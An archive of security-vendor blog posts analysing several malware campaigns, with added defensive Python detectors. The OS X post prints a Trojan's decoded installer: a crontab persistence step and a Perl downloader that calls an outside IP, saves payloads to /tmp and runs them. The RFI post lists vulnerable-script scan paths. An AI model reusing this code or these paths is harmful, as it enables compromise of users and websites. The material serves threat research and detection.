Illuminating The Etumbot APT Backdoor

By: Arbor Networks -

The Arbor Security Engineering Response Team (ASERT) has released a research paper concerning the Etumbot malware.

Etumbot is a backdoor used in targeted attacks since at least March 2011. Indicators suggest that Etumbot is associated with the Numbered Panda group, also known as IXEHSE, DynCalc, and APT12.  Although previous research has covered related malware, little has been publicly discussed regarding Etumbot’s capabilities.

Indicators suggest that the Etumbot dropper is delivered via spear phishing and is contained inside an archive file intended to be of interest to the target. The attackers use the Unicode Right to Left Override technique and document icons to disguise malicious executable content as document files. Once the dropper is executed, the backdoor is activated and a distraction file of interest to the target is opened for viewing.  ASERT has observed several Etumbot samples using distraction documents involving Taiwanese and Japanese topics of interest, and has also observed recent development activity which indicates that attack campaigns are ongoing.
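As an added defender-side example (not code from the ASERT report), here is a Python check for the Right-to-Left Override disguise described above: it computes the name a file browser would display, recovers the real extension, and scans a constructed archive for members that use the trick. The executable-extension list and the sample archive are assumptions made for this example.

```python
import io
import zipfile

# Unicode bidi controls. U+202E (RIGHT-TO-LEFT OVERRIDE) is the one the post
# describes; the others are related overrides/embeddings/isolates that a
# scanner should treat the same way.
BIDI_CONTROLS = frozenset("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")

# Extensions Windows runs directly (assumption: a typical gateway list).
EXECUTABLE_EXTENSIONS = frozenset(
    {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "jar", "hta"}
)


def rendered_name(filename: str) -> str:
    """Approximate what a file browser shows for the name.

    Text after a RIGHT-TO-LEFT OVERRIDE is drawn mirrored, so
    "report\u202ecod.exe" is displayed as "reportexe.doc".
    """
    head, _sep, tail = filename.partition("\u202e")
    head = "".join(c for c in head if c not in BIDI_CONTROLS)
    tail = "".join(c for c in tail if c not in BIDI_CONTROLS)
    return head + tail[::-1]


def real_extension(filename: str) -> str:
    """The extension the OS actually uses, ignoring every bidi control."""
    clean = "".join(c for c in filename if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[1].lower() if "." in clean else ""


def analyze_name(filename: str) -> dict:
    """Flag a name that hides an executable extension behind a bidi override."""
    has_bidi = any(c in BIDI_CONTROLS for c in filename)
    ext = real_extension(filename)
    return {
        "rendered": rendered_name(filename),
        "real_extension": ext,
        "bidi_control": has_bidi,
        "suspicious": has_bidi and ext in EXECUTABLE_EXTENSIONS,
    }


def suspicious_members(zip_bytes: bytes) -> list:
    """Names inside a ZIP archive that use the disguise. Only the archive
    directory is read; nothing is extracted."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if analyze_name(n)["suspicious"]]


def build_sample_archive() -> bytes:
    """Constructed sample: one disguised executable and one benign document.
    Member names and contents are made up for this example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Taiwan_briefing\u202ecod.exe", b"MZ placeholder, not a real PE")
        zf.writestr("agenda.docx", b"PK placeholder, not a real document")
    return buf.getvalue()


if __name__ == "__main__":
    for name in suspicious_members(build_sample_archive()):
        info = analyze_name(name)
        print(f"displayed as {info['rendered']!r}, really .{info['real_extension']}")
```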

Once installed, the backdoor connects to its Command & Control server and receives an encryption key. RC4 encryption, along with HTTP transactions intended to blend in with typical traffic, is used for backdoor communications. Etumbot’s core functionality allows for the execution of commands and the capability to upload and download files.

Attackers attempt to obfuscate the malware by using a technique known as “byte strings”, also known as “string stacking”. Through the use of ASERT tools, these byte strings are deobfuscated and revealed herein.

A timeline containing distraction documents, along with backdoor and dropper indicators (MD5 hashes, Command & Control server information, and file system and process artifacts), is included herein. Some use of the HTran connection bouncer has been observed, indicating that selected C&Cs were simply compromised sites used to relay traffic elsewhere.

It is our aim to assist incident response and security teams and to provide meaningful insight into this threat.

Download the full report: ASERT Threat Intelligence Brief 2014-07: Illuminating the Etumbot APT Backdoor

Into the Light of Day: Uncovering Ongoing and Historical Point of Sale Malware and Attack Campaigns

By: cwilson -

Point of Sale systems that process debit and credit cards are still being attacked with an increasing variety of malware. Over the last several years PoS attack campaigns have evolved from opportunistic attacks involving crude theft of card data with no centralized Command & Control, through memory scraping PoS botnets with centralized C&C and most recently to highly targeted attacks that require a substantial amount of lateral movement and custom malware created to blend in with the target organization.

While contemporary PoS attackers are still successful in using older tools and methodologies that continue to bring results due to poor security, the more ambitious threat actors have moved rapidly, penetrating organizational defenses with targeted attack campaigns. Considering the substantial compromise lifespans within organizations that have active security teams and managed infrastructure, indicators shared herein will be useful to detect active as well as historical compromise.

Organizations of all sizes are encouraged to seriously consider a significant security review of any PoS deployment infrastructure to detect existing compromises as well as to strengthen defenses against an adversary that continues to proliferate and expand attack capabilities.

In addition to recent publications discussing Dexter and Project Hook malware activity, Arbor ASERT is currently tracking other PoS malware to include Alina, Chewbacca, Vskimmer, JackPoS and other less popular malware such as variants of POSCardStealer and others. Attack tactics shall also be explored through analysis of an attacker’s toolkit.

The longevity and extent of attack campaigns is a serious concern. In organizations with security teams and well managed network infrastructure, point of sale compromises have proliferated for months prior to detection. If attackers are able to launch long-running campaigns in such enterprise retail environments, one can conclude that many other organizations with less mature network and infrastructure management are also at serious risk. A sample of high-profile incident timelines, showing the date of the initial compromise, compromise timespan and compromise scope (number of stores in this context) is included to highlight this point.

Download the full report: ASERT Threat Intelligence Brief 2014-06 Uncovering PoS Malware and Attack Campaigns

ASERT Threat Intelligence would like to thank fellow ASERT team members Dave Loftus, Alison Goodrich, Kirk Soluk and Matt Bing and also wishes to thank David Dunn of FIS Global and the Shadowserver Foundation for providing additional information.

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook. The Dexter campaign looks more active, especially in the Eastern Hemisphere, and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known; however, PoS systems suffer from the same security challenges as any other Windows-based deployment. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere


Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere


For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report –

Dexter and Project Hook Break the Bank

Fort Disco Bruteforce Campaign

By: Matthew Bing -

In recent months, several researchers have highlighted an uptick in bruteforce password guessing attacks targeting blogging and content management systems. Arbor ASERT has been tracking a campaign we are calling Fort Disco that began in late May 2013 and is continuing. We’ve identified six related command-and-control (C&C) sites that control a botnet of over 25,000 infected Windows machines. To date, over 6,000 Joomla, WordPress, and Datalife Engine installations have been the victims of password guessing.

Background

Understanding an attack campaign by only analyzing a malware executable file is a Sisyphean task. The malware alone can be picked apart by disassemblers, poked and prodded in a sandbox, but by itself offers no clues into the size, scope, motivation, and impact of the attack campaign. It’s much like a historian finding a discarded weapon on an ancient battlefield. Several things can be inferred, but painting a complete picture is difficult.

Researchers have several techniques at their disposal to gauge the size of a botnet. They can sinkhole discarded domains or monitor traffic to live attack sites to observe infected hosts checking in to a C&C site. In rare instances, the controller of a botnet may inadvertently leave clues publicly accessible for anyone to observe.

Figure: the “ftdisco” string in the malware’s PE metadata

The controller of the campaign we call Fort Disco, named after one of the strings found in the PE metadata field, inadvertently left publicly accessible log files that lay out a complete picture of the campaign. There are six C&C sites that we believe are related. The sites either share a subdomain or are co-hosted with each other, and have similar structures.

Windows Malware

There are at least four variants of the Windows malware related to the Fort Disco campaign. A newly infected machine registers with the C&C site hardcoded into the malware:

> POST /cmd.php HTTP/1.0
>
> status=0

The malware then checks in to receive commands:

> GET /cmd.php HTTP/1.0
< 1
< 30
< http://[xxx]/10823.txt
< qazxsw
< 480

The command structure can vary, but the important commands are the third and fourth lines. The third line is a URL of a list of sites to attack. We’ve observed the target list being anywhere from 5,000 to 10,000 sites at a time. The C&C tends to give out the same list to multiple infections.

The fourth line is the password to use, and in some cases can be a URL to a password list. What’s particularly interesting about this bruteforce list is that it supports the dynamic values {domain} and {zone}. These values are replaced with the target’s domain name and top-level zone, respectively. For instance, if the malware were targeting a blog at www.example.com and was configured to use “{domain}” as a password, the malware would attempt logging in with the password “example”. We’ve observed the password lists being used anywhere from 150 to 1,000 entries.

The malware has a URL of usernames hardcoded. The list is small, anywhere from one to five, and usually consists of “admin” or “administrator”. The login names also support {domain} values.

The malware will attempt to log in to the target list with combinations of the supplied usernames and passwords. Successful username/password combinations are reported back to the C&C by posting to the file /bruteres.php. Results are appended to a text file publicly accessible via the web.

It’s unclear exactly how the malware gets installed. We were able to find reference to the malware’s original filename (maykl_lyuis_bolshaya_igra_na_ponizhenie.exe) that referred to Michael Lewis’ book “The Big Short: Inside The Doomsday Machine” in Russian with an executable attachment. Another filename, proxycap_crack.exe, refers to a crack for the ProxyCap program. It’s unclear if victims were enticed to run these files, and if so, if that is the only means of infection. The C&C sites did not offer additional clues as to the infection mechanism.

Figure: passive DNS requests for a Fort Disco C&C domain (Umbrella Security Graph)

Activity to the C&C sites continues. The above chart from Umbrella Security Graph’s passive DNS data shows regular and continuing requests for this particular C&C domain name.

The log files found on the C&C sites included the IP addresses of victims. Some level of skepticism is required, since we are analyzing data that could have been altered by the attacker. We found 25,611 unique IP addresses connecting to the six C&C sites. Mitigating factors such as double-counting infections behind a NAT, and infected machines changing IP addresses may affect the final tally.

The top three countries with infections are the Philippines, Peru, and Mexico. Interestingly, it seems the United States and Western Europe are underrepresented. For an interactive map showing infected clients, click here.

Compromised Sites

Continuing to analyze the logs recovered from the C&C, we were able to compile a list of usernames and passwords for 6,127 sites.  Only three types of platforms were targeted: Joomla (/administrator/index.php), WordPress (/wp-login.php), and Datalife Engine (/admin.php).
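Because each Fort Disco bot makes only a handful of attempts against any one site while the botnet as a whole makes thousands, a per-source-IP threshold misses most of the activity. The added Python example below (not from the ASERT post) instead counts POSTs to the three login endpoints per virtual host and reports how many distinct sources took part; it assumes Apache’s vhost_combined log format, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# The three login endpoints the campaign targeted, keyed by path.
LOGIN_ENDPOINTS = {
    "/administrator/index.php": "Joomla",
    "/wp-login.php": "WordPress",
    "/admin.php": "Datalife Engine",
}

# Apache "vhost_combined" prefix: %v:%p %h %l %u %t "%r" %>s ...
LOG_RE = re.compile(
    r'^(?P<vhost>[^ :]+)(?::\d+)? (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Fields we need from one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "vhost": m.group("vhost").lower(),
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def find_distributed_guessing(lines, threshold=5, window_seconds=600):
    """Per virtual host, find the busiest window of login POSTs and flag hosts
    whose count reaches `threshold`, however many source IPs were involved."""
    by_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_ENDPOINTS:
            by_host[rec["vhost"]].append(rec)

    alerts = []
    for vhost, recs in by_host.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        for end in range(len(recs)):  # sliding window over sorted attempts
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({
                "vhost": vhost,
                "attempts_in_window": best,
                "total_attempts": len(recs),
                "distinct_ips": len({r["ip"] for r in recs}),
                "platforms": sorted({LOGIN_ENDPOINTS[r["path"]] for r in recs}),
                # A redirect after a login POST usually means the credentials
                # were accepted (WordPress answers a failed login with 200).
                "possible_successes": sum(300 <= r["status"] < 400 for r in recs),
            })
    return alerts


# Constructed sample log (documentation-range addresses, not real victims).
SAMPLE_LOG = [
    'blog.example.ru:80 203.0.113.7 - - [10/Jul/2013:14:02:01 +0000] "POST /wp-login.php HTTP/1.0" 200 3412 "-" "Mozilla/4.0"',
    'blog.example.ru:80 203.0.113.7 - - [10/Jul/2013:14:02:03 +0000] "POST /wp-login.php HTTP/1.0" 200 3412 "-" "Mozilla/4.0"',
    'blog.example.ru:80 198.51.100.44 - - [10/Jul/2013:14:02:40 +0000] "POST /wp-login.php HTTP/1.0" 200 3412 "-" "Mozilla/4.0"',
    'blog.example.ru:80 192.0.2.130 - - [10/Jul/2013:14:03:15 +0000] "POST /wp-login.php HTTP/1.0" 200 3412 "-" "Mozilla/4.0"',
    'blog.example.ru:80 203.0.113.250 - - [10/Jul/2013:14:03:58 +0000] "POST /wp-login.php HTTP/1.0" 200 3412 "-" "Mozilla/4.0"',
    'blog.example.ru:80 198.51.100.44 - - [10/Jul/2013:14:04:50 +0000] "POST /wp-login.php HTTP/1.0" 302 0 "-" "Mozilla/4.0"',
    'blog.example.ru:80 198.51.100.9 - - [10/Jul/2013:14:05:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    'shop.example.com:80 192.0.2.77 - - [10/Jul/2013:14:06:10 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    'shop.example.com:80 192.0.2.77 - - [10/Jul/2013:14:06:30 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for alert in find_distributed_guessing(SAMPLE_LOG):
        print(alert)
```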


The attacker chooses the sites to attack; judging by the top ten top-level domains among the sites with listed usernames and passwords, the targets appear to favor Russia:

Top-Level Domain Number
RU 2582
COM 1601
UA 348
NET 329
ORG 254
INFO 110
KZ 99
US 84
BY 76
xn--p1ai 65

The top ten passwords for these sites seem to indicate that these are targets of opportunity as these passwords are the “weakest of the weak”.

Password Number
admin 893
123456 588
123123 371
12345 360
{domain} 248
pass 218
123456789 171
1234 150
abc123 136
123321 131
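Here is an added Python policy check (not from the post) that turns the two points above into a test a site owner can run against their own CMS admin accounts: it expands the {domain} and {zone} placeholders the way the post describes for www.example.com, and rejects the top-ten passwords and the default usernames. The hostname-splitting rule and the minimum-length threshold are assumptions, not from the post.

```python
# Top ten passwords recovered from the Fort Disco C&C logs (from the post).
TOP_PASSWORDS = [
    "admin", "123456", "123123", "12345", "{domain}",
    "pass", "123456789", "1234", "abc123", "123321",
]
# Usernames the post says the bot tries; "{domain}" is supported there too.
DEFAULT_USERNAMES = ["admin", "administrator", "{domain}"]
MIN_LENGTH = 12  # assumption: a local policy value, not from the post


def domain_and_zone(hostname: str) -> tuple:
    """Split a hostname the way the post describes: www.example.com gives
    domain "example" and zone "com". Assumption: the domain is the label
    just before the last one, so a "www." prefix is ignored."""
    labels = hostname.lower().strip(".").split(".")
    if len(labels) == 1:
        return labels[0], ""
    return labels[-2], labels[-1]


def expand(template: str, hostname: str) -> str:
    """Replace {domain} and {zone} in a username or password template."""
    domain, zone = domain_and_zone(hostname)
    return template.replace("{domain}", domain).replace("{zone}", zone)


def check_admin_credentials(hostname: str, username: str, password: str) -> list:
    """Reasons a CMS admin login would fall to this campaign's guessing.
    An empty list means the credentials pass the check."""
    domain, _zone = domain_and_zone(hostname)
    findings = []
    if username.lower() in {expand(u, hostname) for u in DEFAULT_USERNAMES}:
        findings.append(f"username {username!r} is one the bot tries")
    if password in {expand(p, hostname) for p in TOP_PASSWORDS}:
        findings.append("password is in the campaign's top-ten list (after template expansion)")
    elif domain and domain in password.lower():
        # Stricter than the bot's exact {domain} match, but the same idea.
        findings.append(f"password contains the site's domain label {domain!r}")
    if len(password) < MIN_LENGTH:
        findings.append(f"password shorter than {MIN_LENGTH} characters")
    return findings


if __name__ == "__main__":
    # Constructed examples: one account the campaign would have broken, one it would not.
    for host, user, pw in [("www.example.com", "admin", "example"),
                           ("blog.example.ru", "alice", "correct-horse-battery-staple-1")]:
        print(host, user, check_admin_credentials(host, user, pw) or "ok")
```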

With the compromised credentials, the commander of the botnet also installed a variant of the “FilesMan” PHP backdoor onto 788 of the sites. This password-protected backdoor allows the attacker to browse the filesystem, upload or download files, and execute commands.

The ultimate intent of the campaign remains unclear. On several compromised sites we found two tools:

• A simple PHP-based redirector that sends browsers running Windows with either “MSIE”, “Firefox”, or “Opera” in the User-Agent to a website through several more layers of redirection ultimately landing on a Styx exploit kit.
• A WordPress plugin and supporting library to import posts from a Tumblr blog.

We were not able to find any evidence that the tools were actually used, but based on their nature, we can speculate that the intent of the attacker is to serve exploit kits on these compromised sites.

Attribution

There are several clues that lead us to believe the owner is based in a post-Soviet state:

• The majority of the sites targeted are in Russia or the Ukraine.
• All of the C&C sites are hosted in Russia or the Ukraine.
• A Russian error string was found on several C&C sites: “Не могу подключиться к базе данных!”, which translates to “Unable to connect to database!”
• Although this appears to be the default, the character set of the FilesMan backdoor is set to “Windows-1251”, or the Cyrillic code page.
• The Datalife Engine platform appears to be popular in Russia.

Conclusion

Beginning with the Brobot attacks in early 2013, we’ve seen attackers focusing on targeting blogs and content management systems. This marks a tactical change in exploiting weak passwords and out-of-date software on popular platforms.  By uploading a PHP shell to compromised sites, an attacker can easily issue commands to thousands of compromised sites in seconds.

Blogs and CMSs tend to be hosted in data centers with immense network bandwidth. Compromising multiple sites gives the attacker access to their combined bandwidth, much more powerful than a similarly sized botnet of home computers with limited network access. While we have no evidence the Fort Disco campaign is related to Brobot or denial-of-service activity, we’ve experienced the threat that a large blog botnet can deliver.

Related MD5 Hashes


Arbor Networks at Virus Bulletin 2011

By: jedwards -

Arbor’s ASERT team has a paper at this year’s Virus Bulletin conference in Barcelona, Spain. The paper, by Arbor’s Jeff Edwards and Jose Nazario, is titled A survey of Chinese DDoS malware and is based on some of the detailed analysis we did as part of the development of the ATLAS intelligence feed or AIF. Our malware stream contains a lot of DDoS bots, many from China, one of the more interesting ecosystems of malware development.

The abstract follows:

This paper surveys the diverse landscape of Trojan horse families populating a specific niche in the overall malware ecosystem: botnets that primarily serve as Distributed Denial of Service (DDoS) attack agents and which are believed to be of Chinese origin and/or to be primarily controlled from Chinese IP space.

Approximately two dozen distinct malware families will be described and documented, including the Rincux, NetBot Attacker, IMDDOS, Darkshell and YoyoDDoS families. These families will be characterized in terms of their command and control (CnC) protocols, DDoS attack capabilities, general code architecture, organization of their CnC infrastructure, and preferred targets.

Findings regarding the evolution and sharing/cross-pollination of malcode, as well as the build/release frequency of new versions will be presented. An approximate taxonomy of this particular space of malware will be proposed. The bulk malware analysis infrastructure that was used to obtain these findings will also be briefly described.

The paper is quite in-depth and contains a lot of technical details not covered in the talk, so be sure to refer to the paper if the talk is at all interesting.

Malicious Google AppEngine Used as a CnC

By: Jose -

Over the weekend our zoo found a malware sample that revealed a malicious Google AppEngine application. The app in question is being used to feed URLs to the zombies for them to download. We got the malware via sample sharing, and its original location and infection information is absent. The malware details are below:

MD5: 2143a7b9a9de6ea26987ed8ece29d2c6
SHA1: 30f6befc76e4e269e5aa9c01c735d55d7ca4099a
File type: application/x-ms-dos-executable
File size: 65024 bytes

It’s a simple HTTP engine and downloader, packed with UPX. The C&C is visible in the unpacked sample:

http://xiaoiboxip.appspot.com/[OMITTED]?hostname=&&systemcpoy=&&userName=

Where [OMITTED] refers to a four letter expletive (this is a family friendly blog, folks!).

This was bound to happen, after all, in an open environment like this where people’s abilities are limited by their intentions. The C&C appears to manage infections on the basis of the computer hostname sent in the request; a unique hostname yields the malcode URL to update:

<br>http://XX.XX.76.85/aa.exe</br>

In this case aa.exe is a PCClient backdoor on the infected PCs. When the client checks back in after that, it just gets the word “cmd”. It’s unclear to me what additional commands the C&C can issue to clients.

A quick analysis of the original malware doesn’t reveal any additional functionality, just the downloader bits. (See below) Google’s been contacted for the AppEngine to be taken down, and the site hosting the second stage malware has been contacted for takedown, as well.

UPDATE Google has confirmed the malicious AppEngine is now down.

UPDATE 2 Actually, looking at the sample reveals that it talks to a host in China using what at first blush appears to be a Grey Pigeon protocol.

UPDATE 3 Found another URL the app used, but I’m not sure what it was used for:

http://xiaoiboxip.appspot.com/getip?speed=100


The Google cache of the results suggests it reads something like “Today visited 42 times this month, visited 587 times.” It’s unclear if that’s the size of the botnet or what.

Things in 3FN

By: Jose -

I think by this time folks know about the FTC action against 3FN (Triple Fiber Network). Here’s some of the stuff we had tracked there over the years.

Figure: 3FN activity timeline

Don’t expect spam to drop to record lows any time soon, but … well done by the FTC.

New OS X Malcode: Not Just a DNSChanger

By: Jose -

Seems that Apple’s OS X has been taking a minor beating on the malcode front lately, as noted in the blog post New Trojans Strike OS X from CA. I got a copy of it last night and had a look; I wanted to see what the OS X malcode community was up to. The answer is both nothing much (it’s like we stepped back to 1999) and some new stuff (new approaches not yet seen in the OS X world, but old hat on Windows).

I became aware of the malcode through this URL shared in a ShadowServer link report:

http://online-channels.net/[REMOVED]/spam.txt

which yields the message “LOL look what the kid does to himself >> http://online-channels.net/[REMOVED]/random/1696/0/ :P :| !”, which will get spammed out in some message layer. About that hostname and IP, it’s located in the Netherlands (abuse contact has been made, we’ll see about takedown). It’s User-agent aware and delivers a Mac executable for folks on OS X and a Windows EXE for other folks.

online-channels.net A INET 89.248.172.213
AS      | IP               | AS Name
29073   | 89.248.172.213   | ECATEL-AS AS29073, Ecatel Network

If you visit the website you see something like this, which leads to an “install this codec” response.

Figure: the Jahlav.A download page with the fake codec prompt

I’m sure you can see why I was suspicious: running this on an OS X system produces a fake Windows XP dialogue box. So I downloaded it and had a look. It’s an OS X DMG file named “cold-live7000.dmg”.

MD5 (cold-live7000.dmg) = eaac894f299d15e75f48d99e4d9b254f

The OS X version of this file has very poor AV detection according to VirusTotal. The Windows EXE (MD5 = 042d747ac1494035fa4e26845aebfddc) has 7/32 detected in VirusTotal, using names like “TR/DNSChanger.hkx”, “Win32:FaDrop”, “TrojanDropper:Win32/Alureon.gen!B”, “a variant of Win32/Kryptik.BT”, and “Mal/BadNSIS”. It contacts a different host:

AS      | IP               | AS Name
29073   | 94.102.60.56     | ECATEL-AS AS29073, Ecatel Network

Right next door to the OS X server (see below).

When you mount it under OS X you get a volume named “install.pkg”. For those of you not used to OS X, install.pkg is a typical name for an installer (.pkg is common in OS X). Nothing too up-and-up yet! Let’s start digging in:

o:/Volumes/install.pkg/install.pkg/Contents jose$ ls -lrt
total 96
drwxr-xr-x   8 jose  jose    272 Nov 15 12:35 Resources
-rw-r--r--   1 jose  jose      9 Nov 15 12:35 PkgInfo
-rw-r--r--   1 jose  jose   3277 Nov 15 12:35 Archive.pax.gz
-rw-r--r--   1 jose  jose  35617 Nov 15 12:35 Archive.bom
-rw-r--r--   1 jose  jose   1329 Nov 15 12:35 Info.plist

So far this looks … well, interesting. Let’s first dig into the Resources subdirectory, that usually has the very intriguing bits:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ ls -lrt
total 48
-rwxr-xr-x   1 jose  jose  8027 Oct 28 10:43 License
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preupgrade
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preinstall
-rw-r--r--   1 jose  jose    17 Nov 15 12:35 package_version
drwxr-xr-x   3 jose  jose   102 Nov 15 12:35 en.lproj
-rw-r--r--   1 jose  jose   545 Nov 15 12:35 BundleVersions.plist

The files “preupgrade” and “preinstall” do not differ; they’re shell scripts:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ less preinstall
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -35 $0 | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
begin 777 withlove
M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6&ES=#U@8W)O;G1A8B`M;'QG

(Truncated) If we UUdecode that block (withlove) we get another script:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ uudecode -o /dev/stdout /tmp/withlove.uue
EVIL="applemac"
path="/Library/Internet Plug-Ins"
exist=`crontab -l|grep $EVIL`
if [ "$exist" == "" ]; then
     echo "*/5 * * * * "$path/$EVIL" 1>/dev/null 2>&1" > cron.inst
     crontab cron.inst
     rm cron.inst
fi
#
tail -21 $0 | uudecode -o /dev/stdout | sed 's/7777/bsd/' | sed 's/typeofrun/gnu/' | perl && exit
begin 666 jah
M(R$O=7-R+V)7)L"G5S92!)3SHZ4V]C:V5T.PIM>2`D:7`](CDT+C$P
M,BXV,"XQ,#8B+"1A;G-W97(](B(["FUY("1R=6YT>7!E/71Y<&5O9G);CL*
M"G-U8B!T<@/2!S:&EF=#L*"21S=')I;F<@
M/7X@<

(Truncated again) The first part of that installs a crontab entry (scheduled job) that runs the script it is about to install every five minutes, as the installing user, to look for new malcode. The UUencoded archive “jah” is a Perl script:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ cat /tmp/jah.uue | uudecode -o /dev/stdout | sed 's/7777/7000/' | sed 's/typeofrun//'
#!/usr/bin/perl
use IO::Socket;
my $ip="94.102.60.106",$answer="";
my $runtype=;
#
sub trim($)
{
         my $string = shift;
         $string =~ s/\r//;
         $string =~ s/\n//;
         return $string;
}
#
my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"80",Proto=>"tcp")
or return;
print $socket "Gtor.pl HTTP/1.0\r\nUser-Agent: ".trim(`uname -p`).";$runtype;".trim(`hostname`).";\r\n\r\n";
#
while(<$socket>){ $answer.=$_;}
close($socket);
#
my $data=substr($answer,index($answer,"\r\n\r\n")+4);
if($answer=~/Time: (.*)\r\n/)
{
     my $cpos=0,@pos=split(/ /,$1);foreach(@pos)
     {
         my $file="/tmp/".$_;
         #
         open(FILE,">".$file);
         print FILE substr($data,$cpos,$_);
         close(FILE);
         #
         chmod 0755, $file;
         system($file);
         #
         $cpos+=$_;
     }
}

And with this your box is downloading various malcode, they know what you’re running, and further exploits are possible.

Earlier today the malcode phoned home to this HTTP server in AS29073 in the Netherlands:

AS29073   | 94.12.60.106    | ECATEL-AS AS29073, Ecatel Network

Now that same server has moved to the UK:

AS4589    | 94.12.60.106     | EASYNET Easynet Group Plc

It’s no longer responding for me; it’s possible that Easynet took care of it.

UPDATE
I’ve been editing this post for the past hour or so adding new details as they come in. In addition to the single Windows sample I posted above, a handful more related samples have shown up in our database in the past week:


These samples connect to 94.102.60.56, but one of them connects to 78.157.142.108, located in UltraNet:

AS      | IP               | AS Name
35057   | 78.157.142.108   | ULTRANET-AS UltraNet Ltd.

That ISP is apparently in Latvia (.lv) … The Windows EXEs also POST to a script on the web server to announce their infections and get new binaries.

What’s even more interesting is the degree of investment this team has made in OS X malcode. They’ll be making new infections, it seems, for some time to come with that configurable loader.

Inside an RFI Botnet

By: Jose -

It all began innocently enough; I have been analyzing Apache logs for a while now, and when I spotted an RFI bot that was named “ddos.txt”, you know I had to look. After downloading it and analyzing it, I joined the channel with a copy of Bladerunner and started watching. The net’s been pretty quiet, but here are a few messages that came across lately:

Tue Nov 11 00:11:14 2008
 @scan index.php?rage= index.php?rage=
...
Thu Nov 13 07:12:37 2008
 !scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
Thu Nov 13 07:12:37 2008
 !scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
Thu Nov 13 07:12:37 2008
 !scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
Thu Nov 13 07:12:37 2008
 !scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
Thu Nov 13 07:12:37 2008
 !scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
Thu Nov 13 07:12:37 2008
 !scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
Thu Nov 13 07:12:37 2008
 !scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
Thu Nov 13 07:12:40 2008
 !scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
Thu Nov 13 07:12:41 2008
 !scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
Thu Nov 13 07:12:43 2008
 !scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
...
Fri Nov 14 12:27:15 2008  4,12Ciao a tutti
Fri Nov 14 12:27:17 2008  4,12Arrivederci alla prox
...
Mon Nov 17 16:35:05 2008  hello
Mon Nov 17 18:54:45 2008  hello

Looks like Italian-language hackers simply growing a botnet. No DDoS attacks launched, so far.

